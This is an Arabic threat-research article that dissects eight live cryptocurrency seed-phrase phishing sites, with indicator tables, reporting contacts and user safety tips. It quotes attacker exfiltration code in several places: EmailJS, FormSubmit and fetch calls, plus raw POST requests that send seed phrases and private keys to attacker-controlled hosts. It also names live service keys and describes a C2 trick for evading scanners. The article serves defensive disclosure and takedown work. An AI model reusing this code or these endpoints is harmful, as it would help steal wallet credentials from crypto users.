العودة إلى الأخبار
تحقيق متعمق

تحليل عمليات التصيد الاحتيالي المتعلقة بالعملات المشفرة:
تحليل 8 هجمات حقيقية

لقد اعترضنا حركة مرور حية متعلقة بالتصيد الاحتيالي، وقمنا بعملية الهندسة العكسية لخمسة برامج لسرقة عبارات البذور، وتتبّعنا البيانات المسروقة إلى روبوتات Telegram، وحسابات EmailJS، والأنظمة الخلفية لخدمات «التصيد الاحتيالي كخدمة».

27 مارس 2026 أبحاث PhishDestroy 18 دقيقة للقراءة
تحليل تفصيلي لتحقيق في عملية تصيد احتيالي باستخدام العملات المشفرة
يكشف التحليل المباشر لحركة مرور التصيد الاحتيالي التي تم اعتراضها عن البنية التحتية الكاملة للهجوم
8المواقع التي تم تحليلها
7طرق التسريب
1,824+بيانات اعتماد مسروقة
380+ماركات المحافظ
$0تكلفة المهاجم

ما توصلنا إليه

كل يوم، يفقد آلاف مستخدمي العملات المشفرة أموالهم بسبب مواقع التصيد الاحتيالي التي لا يمكن تمييزها عن خدمات المحافظ الشرعية. لكن ماذا يحدث خلف زر «Connect Wallet» المزيف؟ أين تذهب عبارة البذرة الخاصة بك فعليًّا؟

لقد اعترضنا حركة مرور HTTP المباشرة من 5 مواقع تصيد نشطة، وقمنا بتنزيل كودها المصدري الكامل، وتتبّعنا كل نقطة نهاية لتسريب البيانات حتى وجهتها النهائية. يكشف هذا التحقيق عن البنية الكاملة لعمليات التصيد الحديثة التي تستهدف العملات المشفرة — بدءًا من حيل الهندسة الاجتماعية التي تدفعك إلى كتابة عبارة البذرة الخاصة بك، وصولاً إلى روبوت Telegram الذي يرسلها إلى المهاجم في الوقت الفعلي.

إخلاء المسؤولية

جميع عبارات البذور الواردة في هذا المقال هي بيانات اختبار تم إنشاؤها عشوائيًا. ولم تتعرض أي بيانات اعتماد حقيقية للاختراق خلال هذا التحقيق. وقد تم الإبلاغ عن جميع المواقع إلى مزودي خدمات الاستضافة المعنيين وإلى أقسام مكافحة إساءة الاستخدام التابعة لهم.

نمط الهجوم الشامل

على الرغم من اختلاف العلامات التجارية والبنى الخلفية، فإن جميع مواقع التصيد الثمانية تتبع نفس المسار النفسي بالضبط:

الصفحة المقصودةبناء الثقة
محدد المحفظة60–110+ شعارًا
رسالة "جاري الاتصال..." المزيفةمؤقت من 3 إلى 5 ثوانٍ
"فشل الاتصال"يفشل دائمًا
الإدخال اليدويالبذرة / المفتاح / مخزن المفاتيح
التسريبTG / البريد الإلكتروني / API

النقطة الجوهرية: إن الرسوم المتحركة «جاري الاتصال...» تكون دائمًا مبرمج بشكل ثابت ليفشل. في شفرة المصدر للموقع رقم 4، وجدنا const success = false — لا توجد أي محاولة للاتصال بالمحفظة. ويهدف هذا المسار بأكمله حصريًّا إلى توجيه الضحايا نحو نموذج «الاتصال يدويًّا».

سلسلة هجوم التصيد الاحتيالي باستخدام العملات المشفرة المكونة من ست خطوات
سلسلة الهجوم الشاملة المكونة من 6 خطوات، والتي تشترك فيها جميع مواقع التصيد الاحتيالي التي قمنا بتحليلها

المواقع الثمانية: تحليل شامل

1
بروتوكول طبقة الشبكة
networklayers.pages.dev
مباشرCloudflare Pagesروبوت Telegram + EmailJS

انتحال الشخصية

«بروتوكول لامركزي» خيالي للتحقق من صحة المحافظ. يستخدم شريط أسعار CryptoCompare المباشر وروابط إلى مستكشفات بلوكشين حقيقية (إيثريوم، BSC، Polygon، Avalanche، Solana، Cardano) لتعزيز المصداقية. تضم الصفحة الرئيسية أكثر من 100 شعار لمحافظ رقمية وعملية «التحقق» المكونة من 3 خطوات.

سلسلة التسريب المزدوجة

أكثر أنظمة الخلفية تطوراً من بين الخمسة جميعها — حيث يتم إرسال كل بيانات اعتماد مسروقة عبر قناتان مستقلتان في الوقت نفسه:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

نتائج الاستخبارات المستمدة من المصادر المفتوحة (OSINT)

المؤشرالقيمة
بريد إلكتروني احتياليBestgrace309@gmail.com
روبوت Telegram@DewdropsTG_bot (رقم التعريف: 7567323692)
مستلم رسالة Telegram@metatech2 (معرّف الدردشة: 7350941887)
الخلفيةemailjs-backend-ovtg.onrender.com
خدمة EmailJSservice_d5qigxs / template_7bqxeaa
المجال المخفيlayerschain.in (من عملية إخفاء عنوان البريد الإلكتروني في CF)
الرسائل المرسلة1,824+ (من معرّف الرسالة في Telegram)
عمر النطاقيومان (TLS: 25 مارس 2026)
إخفاق في إجراءات الأمن التشغيلي (OPSEC)

تم العثور على عنوان البريد الإلكتروني للمهاجم في تعليق في جافا سكريبت في الداخل config.js: // Bestgrace309@gmail.com. لقد نسوا إزالته قبل النشر. بالإضافة إلى ذلك، فإن الخادم الخلفي لـ Telegram مفتوح تمامًا — لا توجد مصادقة، ولا حدود للسرعة. من خلال فك تشفير Cloudflare's data-cfemail بالإضافة إلى التعتيم في كود HTML، اكتشفنا أيضًا عنوان بريد إلكتروني مخفيًّا: support@layerschain.in، متصلة ببنية تحتية لاستضافة المواقع في الهند وجنوب أفريقيا.

2
ترحيل توكن AQLA
token-aqla.pages.dev
مباشرCloudflare Pagesالنماذج غير الثابتة

انتحال الشخصية

نسخة مطابقة تمامًا للواقع حتى على مستوى البكسل أكواليبري (AQLA) صفحة ترحيل الرموز. يحتوي كود HTML على علامة بيانات وصفية تكشف عن المصدر: data-scrapbook-source="https://token.aqla.app/migration"، بتاريخ 19 نوفمبر 2024.

نهج «صفر كود»

يتطلب هذا المهاجم لا يوجد أي كود من جانب الخادم. يتم إرسال النموذج مباشرةً إلى غير ثابت — نظام إدارة النماذج الشرعي للمواقع الثابتة. يتم إعادة توجيه كل إرسال إلى البريد الإلكتروني للمحتال. عنوان البريد الإلكتروني للمهاجم هو لا تظهر أبدًا في شفرة المصدر.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
التكلفة: 0 دولار

Cloudflare Pages: مجاني. Un-static Forms: مجاني. لم يتم شراء أي نطاقات ولم يتم استئجار أي خوادم. إجمالي تكلفة البنية التحتية: صفر دولار.

3
SafePal Typosquat
antiresolve-mysafpalnode.pages.dev
مباشر Cloudflare Pages النماذج غير الثابتة

انتحال الشخصية

يحتوي النطاق الفرعي على "safpal" — وهو خطأ إملائي متعمد في SafePal، وهي محفظة أجهزة شهيرة. يتظاهر الموقع بأنه "Blockchain Wallet Rectification" ويضم 26 فئة موضوعية مزيفة. ويستخدم Typed.js لـ تحريك أسماء السلاسل (إيثريوم، BSC، Polygon...) بالإضافة إلى شريط أخبار LiveCoinWatch لإضفاء المصداقية.

نفس المعدات، نفس المشغل؟

يستخدم نفس قالب التصيد بالضبط كما في الموقع رقم 2: مطابق تمامًا connect.html، متطابق wallets.html مع أكثر من 60 شعارًا، ونفس البنية الخلفية لـ Un-static (مع معرّف نموذج مختلف — 6f1b82c3...da9943af). تشير هذه المجموعة المتطابقة بقوة إلى مشغل واحد يدير كلا الموقعين.

أخطاء في النص: "Privay Policy" (ينقص الحرف 'c')، "seperated" (يجب أن تكون "separated")، "Kestore" (ينقص الحرف 'y'). حقل كلمة المرور يستخدم type="text" بدلاً من type="password".

4
نسخة مطابقة لشبكة Flare
flaremainnet.pages.dev
مباشرCloudflare PagesEmailJS المزدوج (التكرار)

انتحال الشخصية

نسخة مطابقة تقريبًا من شبكة Flare البوابة — بلوكشين EVM حقيقي من الطبقة الأولى مزود ببروتوكولي FTSO و Data Connector. يحاكي أكثر من 30 شريكًا في النظام البيئي، بالإضافة إلى خصائص التنقل والعلامة التجارية. يتم تحميل أيقونات المواقع من موقع يستغل الأخطاء الإملائية: portal.flaremainet.com (ينقص حرف «n» واحد من كلمة «mainnet»).

التكرار المزدوج لـ EmailJS

الموقع الوحيد الذي يستخدم حسابان منفصلان على EmailJS في آن واحد لتوفير التكرار لمنع عمليات الإزالة:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

موضوع البريد الإلكتروني الخاص بكل حالة سرقة: "New Wallet Details from Flare".

هذا مشروع ممول

يحتوي ملف HTML على مدير علامات جوجل (GTM-WX2D2TR), مايكروسوفت كلاريتي (j4bllybjkp), حماية Lunio من الدفع لكل نقرة (PPC)، و بكسل إعلانات Twitter/X. يقوم المهاجم بتشغيل الإعلانات المدفوعة لجذب الضحايا إلى موقع التصيد الاحتيالي وتصفية نقرات الروبوتات. هذه ليست مجرد هواية — إنها عملية ممولة تستند إلى التحليلات والإنفاق الإعلاني.

موقع تصيد تابع لشبكة Flare Network يستخدم كلًّا من EmailJS والإعلانات المدفوعة
الموقع رقم 4: الإعلانات المدفوعة، وتتبع التحليلات، والتسريب المزدوج — العملية الأكثر احترافية
5
COIN NODE / إصلاح المحفظة (PhaaS)
swiftauthapps.pages.dev
تعطل الخادم الخلفيواجهة برمجة تطبيقات PulseResolve (PhaaS)

انتحال الشخصية

خدمة عامة باسم «COIN NODE» / «Wallet Fix» (بدون علامة تجارية محددة). حقوق النشر محفوظة لـ «Wallet Fix 2022» — يبلغ عمر قالب هذه المجموعة 4 سنوات على الأقل. الصور مستضافة على pumpeth.com (WordPress على AWS).

التصيد الاحتيالي كخدمة

البنية الخلفية الأكثر إثارة للقلق: أ واجهة برمجة تطبيقات متعددة المستأجرين تعتمد على UUID:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

يحصل كل محتال على نقطة نهاية UUID خاصة به. ويقوم مشغل مركزي بإدارة واجهة برمجة التطبيقات (API)، وتتبع الحملات، وربما يحصل على حصة من الأموال المسروقة. وهذا هو سرقة العملات المشفرة على نطاق صناعي — نموذج «التصيد الاحتيالي كخدمة».

البنية التحتية ذات الصلة (معظمها معطلة)

المجالالدورالحالة
api.pulseresolve.comواجهة برمجة تطبيقات (API) للتسريبNXDOMAIN
walletissuesfix.netمضيف أيقونة الموقعNXDOMAIN
syncwallet.onlineمضيف الشعارNXDOMAIN
pumpeth.comشبكة توزيع المحتوى (CDN) للصورمباشر (AWS)
واجهة زومبي

الخلفية معطلة، لكن الـ الواجهة الأمامية لا تزال قيد التشغيل على Cloudflare Pages. إذا قام المهاجم بإعادة التسجيل pulseresolve.com، يعود الموقع إلى العمل على الفور.

6
مركز الدعم + استعادة دفتر الأستاذ
wallet-support-39n.pages.dev و ledger-recovery.support
مباشرCloudflare Pages + Replitواجهة برمجة API C2 المخصصةالإكمال التلقائي لـ BIP39

انتحال الشخصية

A عملية ذات شقين: «مركز الدعم» العام على wallet-support-39n.pages.dev مع 15 فئة إصدار مزيفة و39 علامة تجارية للمحافظ، بالإضافة إلى نسخة مطابقة تمامًا من عملية التسجيل في Ledger في ledger-recovery.support مستضاف على Replit — ويشمل اختيار طراز الجهاز، وإعداد رقم التعريف الشخصي (PIN)، وشبكة عبارة البذرة المكونة من 24 كلمة مع ميزة الإكمال التلقائي الحقيقية لـ BIP39.

الخلفية C2 لمكافحة الماسح الضوئي

تقوم صفحة دعم المحفظة بإرسال البيانات المسروقة إلى api.uranustoken.org/log — خادم تحكم (C2) مخصص يعمل بنظامي nginx وUbuntu خلف Cloudflare. الخلفية يقوم عمدًا بإسقاط جميع طلبات GET (تُرجع خطأ 522: انتهت مهلة الانتظار)، ولا تستجيب إلا لطلبات POST. وهذا يعني أن أدوات فحص عناوين URL، وروبوتات التصفح من Google Safe Browsing، والباحثين في مجال الأمن الذين يختبرون اتصال نقطة النهاية باستخدام طلب GET لا يرون شيئًا — فتبدو نقطة التحكم (C2) معطلة.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

يعمل نسخة «Ledger» على تشغيل نظام خلفي منفصل يعمل بتقنية Express.js على منصة Replit نفسها: POST /api/recovery-phrase جمع {deviceId, pin, phrase}. وتُرجع 400 {"error":"Invalid data provided"} في حالة وجود مدخلات غير صحيحة — للتأكد من أن النظام الخلفي مباشر وقيد التحقق الفعلي البيانات المسروقة.

نتائج الاستخبارات المستمدة من المصادر المفتوحة (OSINT)

المؤشرالقيمة
الواجهة الأمامية (المحفظة)wallet-support-39n.pages.dev
الواجهة الأمامية (Ledger)ledger-recovery.support (34.111.179.208)
الخلفية C2 api.uranustoken.org → nginx/1.24.0 Ubuntu
عناوين IP من الفئة C2104.21.60.163 / 172.67.198.35 (Cloudflare)
التحقق من Replita43d3852-5304-47af-a61b-f0f6f3912736
مسجلName.com (ledger-recovery.support)
تم نشرها9 يناير 2026 (رأس «آخر تعديل»)
مجموعة التقنيات React + Vite + Tailwind الإصدار 4.1 + Framer Motion
أعلى مستوى من الدقة في تجربة المستخدم

تحتوي حزمة JS التي يبلغ حجمها 466 كيلوبايت على قائمة الكلمات الكاملة لـ BIP39 بالنسبة لميزة الإكمال التلقائي في الوقت الفعلي، ظهرت كلمة «passphrase» 67 مرة، وكلمة «mnemonic» 39 مرة. يرشد نسخة «ليدجر» المزيفة الضحايا عبر نفس مسار التسجيل بالضبط الذي يتبعه جهاز «ليدجر» الأصلي — وهي الصفحة الأكثر إقناعًا في عملية التصيد الاحتيالي خلال هذا التحقيق بأكمله. الـ apiKey يشير الحقل الموجود في ملف التكوين إلى بنية PhaaS متعددة المستأجرين.

7
منصة إطلاق لامركزية
mainnetvalidationapp.pages.dev
مباشرCloudflare PagesFormSubmit.co

انتحال الشخصية

منصة إطلاق لامركزية عامة تتميز بـ 21 فئة من الطُعم (الاستثمار، الترحيل، إجراءات "اعرف عميلك" (KYC)، المسابقات، المطالبة بالمكافآت، استرداد الأصول، البيع المسبق، إصدار الرموز غير القابلة للاستبدال (NFT)، الحسابات المجمدة...) و أكثر من 70 علامة تجارية للمحافظ — إحدى أكثر قوائم المحافظ شمولاً التي صادفناها. والخطأ المطبعي الدال «Sychronize» (حيث ينقص الحرف «n») يكشف عن كونها مزيفة.

Pipeline «FormSubmit»

الاستخدامات FormSubmit.co — خدمة شرعية لإرسال النماذج عبر البريد الإلكتروني. تجزئة نقطة النهاية a2cf4131f1a5d39453c7c183df96f86f هو قيمة MD5 لعنوان البريد الإلكتروني الخاص بالمحتال. قمنا باختبار مئات أنماط عناوين البريد الإلكتروني عبر خدمات Gmail وYahoo وHotmail وProtonMail وYandex وMail.ru باستخدام طريقة الهجوم العشوائي — لا توجد نتائج مطابقة. يستخدم المحتال عنوان بريد إلكتروني غير شائع أو تم إنشاؤه عشوائياً.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

نتائج الاستخبارات المستمدة من المصادر المفتوحة (OSINT)

المؤشرالقيمة
المجالmainnetvalidationapp.pages.dev
هاش إرسال النموذجa2cf4131f1a5d39453c7c183df96f86f
معرّف الحملةDAPP اللامركزية
مجموعة FontAwesomebdc3291137 (المجموعة رقم 112310842، الإصدار المجاني v6.7.2)
jQueryتم تحميل الإصدارين 3.2.1 و3.5.1 في آن واحد
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (تعارض)
مقبضان للتتبع

مجموعة FontAwesome bdc3291137 — يمكن لـ FontAwesome تحديد مالك الحساب المرتبط برقم تعريف هذه المجموعة. علامة الحملة DAPP DECENTRALIZED قد تظهر على مواقع تصيد أخرى تستخدم نفس التجزئة لـ FormSubmit. بعد سرقة عبارة البذرة، فإن رمز QR مزيف ورمز مرجعي عشوائي مكون من 7 أحرف يتم عرض الرسالة التالية: «اتصل بالمسؤول مع ذكر رمزك المرجعي الفريد» — مما يجعل الضحايا ينتظرون بدلاً من إجراء التحقيق.

8
R2 Bucket + PHP على الكمبيوتر المنزلي
pub-519769e9eb634616b1746c2018641d56.r2.dev
متوفىCloudflare R2PHP + DDNS

انتحال الشخصية

غير معروف — كل من الواجهة الأمامية والخلفية غير متصلتين بالإنترنت. وبناءً على بنية الحمولة، كان هذا هجومًا لسرقة عبارة البذرة الخاصة بمحفظة العملات المشفرة. الـ المخزن العام لـ Cloudflare R2 (التخزين المادي، وليس «Pages») هو وسيلة تصيد موثقة جيدًا حيث تم تحديد أكثر من 5,000 صفحة ضارة، وأفادت شركة Netskope بزيادة في حركة المرور بمقدار 61 ضعفًا.

إعدادات «سكريبت كيدي»

الأكثر عملية أولية في هذه المجموعة. يتم إرسال عبارات البذور كلمة بكلمة إلى برنامج PHP يعمل على جهاز كمبيوتر منزلي أو خادم خاص افتراضي (VPS) عبر خدمة DNS مجانية:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

نتائج الاستخبارات المستمدة من المصادر المفتوحة (OSINT)

المؤشرالقيمة
الواجهة الأمامية pub-519769e9eb634616b1746c2018641d56.r2.dev [غير متصل]
الخلفية mercifuljigga4real123.publicvm.com [NXDOMAIN]
معرّف دلو R2519769e9eb634616b1746c2018641d56
مزود خدمة DDNS DNSExit.com / Netdorm, Inc. (سينسيناتي، أوهايو)
DNS NSns10–13.dnsexit.com
اسم المستخدمmercifuljigga4real123
اسم المستخدم في OSINT: mercifuljigga4real123

"Merciful" + "jigga" (لقب جاي-زي) + "4real" + "123" — اسم مستخدم ذو طابع شخصي واضح يشير إلى ارتباطه بثقافة الهيب هوب. لم يتم العثور عليه على أي منصة مدرجة في الفهرس: GitHub، أو X، أو Instagram، أو TikTok، أو Reddit، أو YouTube، أو Twitch، أو Steam. ومن المرجح أن يكون نشطًا على Discord، أو Telegram، أو منصات الألعاب تحت هذا الاسم أو بأسماء مشابهة له. اسم الملف fuc.php يتناسب مع أسلوب المقبض الجريء.

7 طرق لسرقة عبارة البذرة الخاصة بك

مقارنة بين أربع طرق للتصيد الاحتيالي واستخراج البيانات في مجال العملات المشفرة
سبع بنى مختلفة لعملية تسريب البيانات مستخدمة عبر مواقع التصيد الثمانية
الطريقةالمواقعكيف يعملالسرعةالتكلفة
روبوت Telegram#1 يقوم Express.js على Render.com بالاتصال بـ Bot API عبر خادم وسيط. ويتلقى المحتال رسالة خاصة فورية تحتوي على بيانات الاعتماد. في الوقت الفعلي$0
EmailJS#1, #4 تُرسل جافا سكريبت من جانب العميل مباشرةً إلى API EmailJS، التي تقوم بدورها بتسليمها إلى البريد الإلكتروني الخاص بالمحتال. ~1 دقيقة$0
النماذج غير الثابتة#2, #3 نموذج HTML قياسي يعمل بنمط POST موجه إلى خدمة نماذج شرعية تقوم بإعادة توجيه البيانات المرسلة عبر البريد الإلكتروني. ~1 دقيقة$0
FormSubmit.co#7 jQuery AJAX إلى FormSubmit.co. عنوان البريد الإلكتروني مخفي خلف تجزئة MD5. الحملة مصنفة تحت وسم "DAPP DECENTRALIZED". ~1 دقيقة$0
واجهة برمجة API C2 المخصصة#6 تقوم تطبيق React أحادي الصفحة (SPA) بإرسال الطلبات إلى واجهة برمجة التطبيقات (API) التي تعمل على nginx/Express خلف Cloudflare. يستبعد طلبات GET (522) لتفادي أجهزة الفحص. لا يستجيب إلا لطلبات POST. في الوقت الفعليحوالي 5 دولارات شهريًّا
PHP + DDNS#8 برنامج PHP على جهاز كمبيوتر منزلي عبر خدمة DNS المجانية (publicvm.com). يتم إرسال عبارة البذرة كلمةً كلمةً. في الوقت الفعلي$0
API تطبيقات PhaaS#5 واجهة برمجة تطبيقات (API) متعددة المستأجرين تعتمد على معرّف UUID. يقوم المشغل المركزي بإدارة البنية الخلفية، بينما يستأجر المحتالون نقاط النهاية. في الوقت الفعليغير معروف

7 علامات تحذيرية تكشف كل موقع تصيد احتيالي

إذا رأيت أي في هذه الحالات، أغلق علامة التبويب على الفور:

1. عبارة «فشل الاتصال» هي دائمًا عبارة زائفة

تستخدم الاتصالات الحقيقية بالمحافظ بروتوكول WalletConnect أو ملحقات المتصفح. ولا تظهر أبدًا رسالة الخطأ «فشل الاتصال» التي تطلب منك إدخال عبارة البذرة.

2. 50–110+ شعارًا للمحافظ، وجهة واحدة

تؤدي كل أيقونة محفظة إلى النموذج نفسه. أما الخدمة الحقيقية فستقوم بدمج حزمة SDK الفعلية لكل محفظة.

3. ظهور رسالة «خطأ» بعد الإرسال

إن ظهور «خطأ 503» أو «خطأ غير معروف» المزيف بعد الإرسال هو أمر متعمد. فقد تمت سرقة بياناتك بالفعل — وهذا الخطأ يهدف إلى خداعك لتجرب مرة أخرى باستخدام محفظة أخرى.

4. مستضاف على .pages.dev

تستغل جميع المواقع الخمسة الخدمة المجانية لـ Cloudflare Pages. ولا يُشترط إجراء أي تحقق من الهوية. وقد ارتفعت حالات إساءة استخدام Cloudflare Pages في عمليات التصيد الاحتيالي بنسبة 198% في عام 2025.

5. ثلاث علامات تبويب: العبارة / المفتاح الخاص / مخزن المفاتيح

لا توجد خدمة شرعية تحتاج إلى أنواع بيانات الاعتماد الثلاثة جميعها. ويُعد هذا النموذج ذو الألسنة الثلاثة من السمات المميزة لمجموعة أدوات التصيد الاحتيالي.

6. لا يوجد تفاعل مع تقنية البلوك تشين

لا يتم تحميل أي من هذه المواقع ethers.js, web3.js، أو إجراء أي مكالمات RPC. إنها نماذج HTML بحتة تتظاهر بأنها تطبيقات لامركزية (dApps).

7. بنية تحتية بدون تكلفة

استضافة مجانية + خدمات نماذج مجانية + رسائل مجانية = عملية تصيد احتيالي كاملة مقابل 0 دولار. إذا لم يكن للموقع نطاق حقيقي، فكن حذراً.

جدول IOC الكامل

بالنسبة لفرق الأمن ومنصات معلومات التهديدات ومقدمي بلاغات إساءة الاستخدام:

النطاقات والبنية التحتية

المجالالنوعالحالة
networklayers.pages.devواجهة التصيد الاحتياليمباشر
token-aqla.pages.devواجهة التصيد الاحتياليمباشر
antiresolve-mysafpalnode.pages.devواجهة التصيد الاحتياليمباشر
flaremainnet.pages.devواجهة التصيد الاحتياليمباشر
swiftauthapps.pages.devواجهة التصيد الاحتياليمباشر
emailjs-backend-ovtg.onrender.comالخلفية الخاصة بـ TG Relayمباشر
portal.flaremainet.comأصول «تايبوسكوات»غير معروف
layerschain.inالمجال ذو الصلةتعطل نظام أسماء النطاقات (DNS)
api.pulseresolve.comالبنية الخلفية لـ PhaaSNXDOMAIN
walletissuesfix.netمضيف الأصولNXDOMAIN
syncwallet.onlineمضيف الشعارNXDOMAIN
pumpeth.comشبكة توزيع المحتوى (CDN) للصورمباشر (AWS)
wallet-support-39n.pages.devواجهة التصيد الاحتياليمباشر
ledger-recovery.supportالتصيد الاحتيالي عبر Ledger (Replit)مباشر
api.uranustoken.orgالخلفية C2 (nginx/Ubuntu)مباشر
uranustoken.orgنطاق الجذر404
mainnetvalidationapp.pages.devواجهة التصيد الاحتياليمباشر
pub-519769e9eb634616b1746c2018641d56.r2.devالتصيد الاحتيالي (فئة R2)غير متصل
mercifuljigga4real123.publicvm.comالواجهة الخلفية لـ PHP (DDNS)NXDOMAIN

الحسابات والمعرّفات

النوعالقيمةالموقع
البريد الإلكترونيBestgrace309@gmail.com#1
البريد الإلكتروني (مخفي)support@layerschain.in#1
روبوت Telegram@DewdropsTG_bot (7567323692)#1
مستخدم Telegram@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
نموذج غير ثابتc78173e2d991...94c3f76#2
نموذج غير ثابت6f1b82c3ce55...da9943af#3
معرّف UUID لـ PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
مثيل العرضrndr-id: ed83576e-b1b3-4c82#1
التحقق من Replita43d3852-5304-47af-a61b-f0f6f3912736#6
MD5 لإرسال النموذجa2cf4131f1a5d39453c7c183df96f86f#7
وسم الحملةDAPP اللامركزية#7
مجموعة FontAwesomebdc3291137 (الطقم رقم 112310842)#7
معرّف دلو R2519769e9eb634616b1746c2018641d56#8
اسم المستخدم/DDNSmercifuljigga4real123#8

أين يمكن الإبلاغ عن عمليات التصيد الاحتيالي المتعلقة بالعملات المشفرة

أين يمكن الإبلاغ عن مواقع التصيد الاحتيالي المتعلقة بالعملات المشفرة — عمليات إزالة متعددة الجوانب
استهداف خدمات الاستضافة والخدمات الخلفية ومنصات المراسلة في آن واحد لتحقيق أقصى سرعة في عمليات إزالة المحتوى
الخدمةما الذي يجب الإبلاغ عنهكيف
Cloudflare7 وحدات تخزين من نوع .pages.dev + وحدة تخزين واحدة من نوع R2abuse.cloudflare.com
Google Safe Browsingجميع عناوين URL الخاصة بالتصيد الاحتياليالإبلاغ عن محاولة تصيد
PhishTankجميع عناوين URL الخاصة بقائمة الحظر المجتمعيةphishtank.org
EmailJS3 حسابات تعرضت للاختراق (معرّفات الخدمة المذكورة أعلاه)abuse@emailjs.com
غير ثابتنقطتا نهاية النموذج 2الاتصال عبر موقع un-static.com
Render.comالخلفية الخاصة بـ Telegram Relayعرض نموذج الإبلاغ عن إساءة الاستخدام
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
جوجل (جيميل)Bestgrace309@gmail.comتقرير عن إساءة الاستخدام إلى Google
Twitter/Xحساب إعلاني يروج للموقع رقم 4تقرير عن إساءة استخدام الإعلانات X
FormSubmit.coالتجزئة a2cf4131... (#7)نموذج الإبلاغ عن إساءة الاستخدام
Replitledger-recovery.support (رقم 6)تقرير عن إساءة استخدام Replit
Name.comمسجل موقع ledger-recovery.supportقسم مكافحة إساءة الاستخدام في Name.com
DNSExitmercifuljigga4real123.publicvm.comالإساءة على موقع dnsexit.com
FontAwesomeالطقم bdc3291137 (رقم 7)إساءة استخدام FontAwesome
Chainabuseجميع حملات التصيد الاحتياليChainabuse.com

كيف تحمي نفسك

القاعدة الذهبية

لن تطلب منك أي خدمة شرعية أبدًا إدخال عبارة البذرة الخاصة بك في موقع إلكتروني. لا يتم إدخال عبارات البذرة إلا في برامج المحافظ الرسمية أثناء عملية استعادة المحفظة — ولا يتم إدخالها أبدًا على مواقع الويب التابعة لأطراف ثالثة المخصصة لـ«التحقق» أو «المزامنة» أو «الاستعادة».

قبل توصيل أي محفظة:

  • تأكد من أن عنوان URL يتطابق مع النطاق الرسمي. تحقق من تفاصيل شهادة SSL.
  • يستخدم تطبيق «Real WalletConnect» رمز QR أو رابطًا عميقًا — ولا يستخدم أبدًا نموذج عبارة البذرة.
  • إذا «فشل الاتصال» وطُلب منك إدخال بيانات الاعتماد يدويًّا — فهذه محاولة تصيد.
  • تحقق من عناوين URL المشبوهة على PhishTank أو VirusTotal قبل التفاعل.
  • استخدم محفظة مادية — فهي تتطلب تأكيدًا ماديًا لكل معاملة.
  • احفظ عناوين URL الرسمية في قائمة المفضلة. لا تنقر أبدًا على الروابط الواردة في الإعلانات أو الرسائل المباشرة أو وسائل التواصل الاجتماعي.

تصنيف عمليات التصيد الاحتيالي المتعلقة بالعملات المشفرة

لا يُعد سارقو عبارات البذور سوى فئة واحدة فقط. إليكم الصورة الكاملة لعمليات التصيد الاحتيالي في عالم العملات المشفرة — وسنقوم بإضافة تحليلات متعمقة لكل نوع.

برامج سرقة عبارات البذور
صفحات مزيفة لـ «Connect Wallet» تخدعك لتدخل عبارة الاسترداد الخاصة بك. موضوع هذه المقالة — تحليل 5 أمثلة حقيقية.
ما تم تناوله أعلاه
اختطاف الموافقة
التطبيقات اللامركزية (dApps) الخبيثة التي تطلب موافقات غير محدودة على التوكنات عبر MetaMask. وبمجرد الموافقة، يقوم المهاجم باستنزاف محفظتك دون الحاجة إلى عبارة البذرة الخاصة بك.
قريبًا
التصيد الاحتيالي عبر «آيس» (Permit2)
يستغل الثغرة الأمنية EIP-2612 التي تسمح بالتحويل دون استهلاك الغاز. يقوم الضحية بالتوقيع على رسالة خارج السلسلة تمنح حقوق نقل الرموز — ولا تظهر أي موافقة على السلسلة حتى لحظة استنزاف الرموز.
قريبًا
الادعاءات الكاذبة بشأن التوزيعات المجانية
عمليات توزيع التوكنات المزيفة التي تتطلب «المطالبة» بها عبر عقد ذكي ضار. فمعاملة المطالبة هذه تؤدي في الواقع إلى تحويل توكناتك الحقيقية إلى حساب آخر.
قريبًا
برامج اختطاف الحافظة
برنامج ضار يراقب الحافظة ويستبدل بصمت عناوين المحافظ المنسوخة بعنوان المهاجم قبل أن تقوم بلصقها.
قريبًا
